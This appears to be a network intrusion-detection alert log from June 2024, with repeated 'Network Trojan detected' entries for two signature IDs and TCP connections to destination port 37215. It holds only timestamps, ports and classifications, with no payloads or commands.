                Timestamp:06/14/24-10:43:37.761900
                SID:2829579
                Source Port:33184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.846551
                SID:2829579
                Source Port:45766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.147119
                SID:2829579
                Source Port:37720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.763305
                SID:2835222
                Source Port:39424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.502884
                SID:2835222
                Source Port:41152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277106
                SID:2829579
                Source Port:42304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421038
                SID:2829579
                Source Port:46582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.732188
                SID:2835222
                Source Port:59264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.966452
                SID:2829579
                Source Port:45902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.618364
                SID:2835222
                Source Port:58688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.012248
                SID:2835222
                Source Port:34002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.321618
                SID:2829579
                Source Port:33966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.617538
                SID:2829579
                Source Port:53810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.014872
                SID:2829579
                Source Port:35098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.688376
                SID:2835222
                Source Port:40490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.019884
                SID:2829579
                Source Port:48508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.809931
                SID:2835222
                Source Port:57676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.965853
                SID:2829579
                Source Port:45578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.733510
                SID:2835222
                Source Port:38438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134787
                SID:2835222
                Source Port:43792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.111666
                SID:2835222
                Source Port:49488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.152760
                SID:2829579
                Source Port:53940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.366992
                SID:2835222
                Source Port:35862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.017508
                SID:2835222
                Source Port:59908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.228965
                SID:2829579
                Source Port:47882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.383850
                SID:2835222
                Source Port:45414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.383991
                SID:2829579
                Source Port:43678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.019061
                SID:2835222
                Source Port:51600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.882943
                SID:2835222
                Source Port:33354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.024949
                SID:2835222
                Source Port:53874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.150490
                SID:2835222
                Source Port:58308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504084
                SID:2835222
                Source Port:36086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.012340
                SID:2835222
                Source Port:47264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.029525
                SID:2829579
                Source Port:40300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.829107
                SID:2829579
                Source Port:40796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.989703
                SID:2835222
                Source Port:40792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.053426
                SID:2835222
                Source Port:43998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.807828
                SID:2835222
                Source Port:58510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.580872
                SID:2829579
                Source Port:46398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.549395
                SID:2829579
                Source Port:42744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133581
                SID:2829579
                Source Port:50892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.678571
                SID:2835222
                Source Port:51166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.406275
                SID:2835222
                Source Port:49246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.942825
                SID:2835222
                Source Port:53546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452635
                SID:2829579
                Source Port:56232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.276974
                SID:2829579
                Source Port:33164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.323626
                SID:2835222
                Source Port:57956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.808955
                SID:2835222
                Source Port:34972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.704441
                SID:2835222
                Source Port:39662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.032922
                SID:2835222
                Source Port:49536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917401
                SID:2829579
                Source Port:59862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.013347
                SID:2829579
                Source Port:35314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.321836
                SID:2835222
                Source Port:50254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.732268
                SID:2835222
                Source Port:56682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.544835
                SID:2835222
                Source Port:56342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.897307
                SID:2835222
                Source Port:58152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.671062
                SID:2829579
                Source Port:34812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.667118
                SID:2829579
                Source Port:33908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.977829
                SID:2835222
                Source Port:36498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.054791
                SID:2829579
                Source Port:52830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.862518
                SID:2835222
                Source Port:35228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.898219
                SID:2835222
                Source Port:51492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.295667
                SID:2835222
                Source Port:54592
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.811844
                SID:2829579
                Source Port:41176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.517881
                SID:2829579
                Source Port:54664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.789880
                SID:2835222
                Source Port:43530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.715747
                SID:2829579
                Source Port:56996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367489
                SID:2829579
                Source Port:33996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917889
                SID:2835222
                Source Port:60978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.789297
                SID:2829579
                Source Port:37040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.977327
                SID:2835222
                Source Port:53748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.245613
                SID:2835222
                Source Port:34826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.410734
                SID:2835222
                Source Port:44070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.055594
                SID:2829579
                Source Port:46248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917585
                SID:2829579
                Source Port:35354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663384
                SID:2835222
                Source Port:44680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.733009
                SID:2835222
                Source Port:52168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.761361
                SID:2835222
                Source Port:44412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.112320
                SID:2829579
                Source Port:50818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.014173
                SID:2829579
                Source Port:38166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.385691
                SID:2835222
                Source Port:38142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805448
                SID:2835222
                Source Port:46886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.943765
                SID:2829579
                Source Port:55830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662188
                SID:2835222
                Source Port:33150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.021402
                SID:2835222
                Source Port:46740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.019107
                SID:2829579
                Source Port:55444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.072542
                SID:2829579
                Source Port:41184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.450218
                SID:2835222
                Source Port:39752
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.879544
                SID:2835222
                Source Port:52172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.324296
                SID:2829579
                Source Port:51142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133878
                SID:2829579
                Source Port:41138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503845
                SID:2829579
                Source Port:48648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.645056
                SID:2829579
                Source Port:40546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.676922
                SID:2835222
                Source Port:39586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.230697
                SID:2835222
                Source Port:38048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.010099
                SID:2835222
                Source Port:58832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.021280
                SID:2829579
                Source Port:47904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.878779
                SID:2829579
                Source Port:49020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762246
                SID:2829579
                Source Port:43010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.965465
                SID:2829579
                Source Port:59580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.424792
                SID:2829579
                Source Port:58584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.200154
                SID:2835222
                Source Port:53558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716242
                SID:2829579
                Source Port:60422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.986456
                SID:2835222
                Source Port:48930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.149565
                SID:2829579
                Source Port:48466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275752
                SID:2829579
                Source Port:60036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421932
                SID:2835222
                Source Port:55028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.228610
                SID:2829579
                Source Port:57770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.340505
                SID:2835222
                Source Port:37886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184566
                SID:2835222
                Source Port:49976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943319
                SID:2829579
                Source Port:37746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.112201
                SID:2835222
                Source Port:56764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367546
                SID:2835222
                Source Port:39730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.759803
                SID:2829579
                Source Port:51128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.201199
                SID:2835222
                Source Port:41316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.011124
                SID:2829579
                Source Port:43276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.341089
                SID:2829579
                Source Port:53120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792028
                SID:2835222
                Source Port:55280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504896
                SID:2835222
                Source Port:44100
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275662
                SID:2829579
                Source Port:53650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.735304
                SID:2835222
                Source Port:35762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.969610
                SID:2835222
                Source Port:53020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.276057
                SID:2835222
                Source Port:33578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.776498
                SID:2835222
                Source Port:41002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.053711
                SID:2829579
                Source Port:47732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.409303
                SID:2835222
                Source Port:51654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.567618
                SID:2835222
                Source Port:45576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.472947
                SID:2829579
                Source Port:60318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805185
                SID:2835222
                Source Port:51116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.295129
                SID:2829579
                Source Port:49216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.025487
                SID:2835222
                Source Port:48490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.183539
                SID:2835222
                Source Port:38152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.343996
                SID:2835222
                Source Port:52696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.072786
                SID:2829579
                Source Port:50534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.230049
                SID:2835222
                Source Port:47692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762909
                SID:2835222
                Source Port:51102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.228075
                SID:2835222
                Source Port:42146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.014196
                SID:2835222
                Source Port:42964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.681980
                SID:2835222
                Source Port:55294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917062
                SID:2835222
                Source Port:39844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.505133
                SID:2829579
                Source Port:40526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.761369
                SID:2835222
                Source Port:44692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861871
                SID:2829579
                Source Port:33948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.617616
                SID:2835222
                Source Port:38484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.808912
                SID:2835222
                Source Port:50856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.179527
                SID:2835222
                Source Port:49436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.677750
                SID:2835222
                Source Port:47376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.407024
                SID:2829579
                Source Port:42340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.672808
                SID:2835222
                Source Port:44060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.862029
                SID:2835222
                Source Port:58416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.292455
                SID:2835222
                Source Port:47506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.326017
                SID:2829579
                Source Port:39990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.543446
                SID:2835222
                Source Port:50094
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.161572
                SID:2835222
                Source Port:35674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.501737
                SID:2835222
                Source Port:36972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.715540
                SID:2829579
                Source Port:46776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791664
                SID:2835222
                Source Port:57054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.410351
                SID:2835222
                Source Port:34954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.179619
                SID:2829579
                Source Port:40366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.717993
                SID:2835222
                Source Port:38032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.057118
                SID:2829579
                Source Port:53078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.517182
                SID:2835222
                Source Port:36150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.111305
                SID:2829579
                Source Port:44822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367706
                SID:2829579
                Source Port:34946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.366374
                SID:2835222
                Source Port:40564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.090969
                SID:2835222
                Source Port:49550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.383826
                SID:2829579
                Source Port:49396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.031459
                SID:2835222
                Source Port:38586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.859053
                SID:2835222
                Source Port:41700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.985484
                SID:2829579
                Source Port:50692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073908
                SID:2829579
                Source Port:50790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968508
                SID:2829579
                Source Port:44188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.022237
                SID:2829579
                Source Port:57170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.700678
                SID:2829579
                Source Port:46540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.273764
                SID:2835222
                Source Port:35358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.152305
                SID:2835222
                Source Port:34882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.186403
                SID:2829579
                Source Port:50130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.831145
                SID:2829579
                Source Port:41202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.295200
                SID:2835222
                Source Port:38502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.986083
                SID:2835222
                Source Port:43328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.336943
                SID:2835222
                Source Port:43040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792001
                SID:2829579
                Source Port:45438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.228927
                SID:2835222
                Source Port:37976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.732238
                SID:2829579
                Source Port:48388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.111518
                SID:2835222
                Source Port:51668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.624880
                SID:2829579
                Source Port:34000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.053994
                SID:2835222
                Source Port:34908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.812914
                SID:2829579
                Source Port:59226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.011414
                SID:2829579
                Source Port:59324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.675404
                SID:2829579
                Source Port:54138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.029274
                SID:2835222
                Source Port:52400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.761340
                SID:2829579
                Source Port:39846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.944542
                SID:2835222
                Source Port:55276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.882895
                SID:2829579
                Source Port:58718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944770
                SID:2835222
                Source Port:59052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806271
                SID:2835222
                Source Port:35152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.420333
                SID:2835222
                Source Port:60318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.640498
